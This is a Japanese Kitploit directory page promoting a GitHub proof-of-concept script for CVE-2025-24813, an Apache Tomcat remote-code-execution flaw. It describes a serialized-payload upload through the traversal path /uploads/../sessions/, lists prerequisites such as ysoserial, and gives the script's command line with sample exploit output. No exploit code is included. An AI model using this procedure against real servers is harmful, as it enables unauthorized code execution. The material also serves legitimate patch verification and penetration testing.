Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/absholi7ly/poc-cve-2025-24813
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubabsholi7ly/poc-cve-2025-24813

POC-CVE-2025-24813

このリポジトリには、Apache Tomcatのリモートコード実行(RCE)脆弱性である**CVE-2025-24813**を悪用するための自動化された概念実証(PoC)スクリプトが含まれています。この脆弱性により、攻撃者は悪意のあるシリアル化されたペイロードをサーバーにアップロードし、特定の条件が満たされると、デシリアライゼーションを介して任意のコード実行を引き起こすことができます。

リポジトリを見る
19543111年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24813 Apache Tomcat RCE PoC

CVE-2025-24813 を悪用した概念実証 (PoC) です。これは Apache Tomcat におけるリモートコード実行 (RCE) の脆弱性です。攻撃者は悪意のあるシリアライズペイロードをサーバーにアップロードし、特定の条件が満たされるとデシリアライズを介して任意のコードを実行できます。

説明

CVE-2025-24813 は、アップロードされたセッションファイルの不適切な処理とデシリアライズメカニズムを悪用する Apache Tomcat の理論上の RCE 脆弱性です。攻撃者は細工されたペイロードを書き込み可能なディレクトリ (例: /uploads/../sessions/) にアップロードすることで、デシリアライズをトリガーし、ターゲットサーバー上で任意のコマンドを実行できます。


エクスプロイト成功の前提条件

この PoC が脆弱性を正常に悪用するには、以下の条件を満たす必要があります。

  1. Apache Tomcat のバージョン: ターゲットは脆弱なバージョンの Apache Tomcat を実行している必要があります。
  2. 書き込み可能なディレクトリ: サーバーが PUT リクエストを許可している必要があります。
  3. デシリアライズのトリガー: サーバーがアップロードされたセッションファイルを処理し (例: /index.jsp への GET リクエスト)、ペイロードのデシリアライズをトリガーする必要があります。
  4. Java 環境: 攻撃者のマシンには Java がインストールされている必要があります (ysoserial を使用してペイロードを生成するか、Java ベースのペイロードをコンパイルするため)。
  5. ysoserial (オプション): ysoserial ペイロードタイプを使用する場合、ysoserial.jar ファイルがローカルに存在する必要があります。

python CVE-2025-24813.py <target_url> [options]

出力

  • 成功したエクスプロイト:
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://localhost:8081/uploads/../sessions/absholi7ly.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://localhost:8081 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser
  • 失敗したエクスプロイト:
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[-] Payload upload failed: http://localhost:8081/uploads/../sessions/absholi7ly.session (HTTP 403)
[-] Target http://localhost:8081 does not appear vulnerable or exploit failed.
[+] Temporary file removed: payload.ser
ツールをダウンロード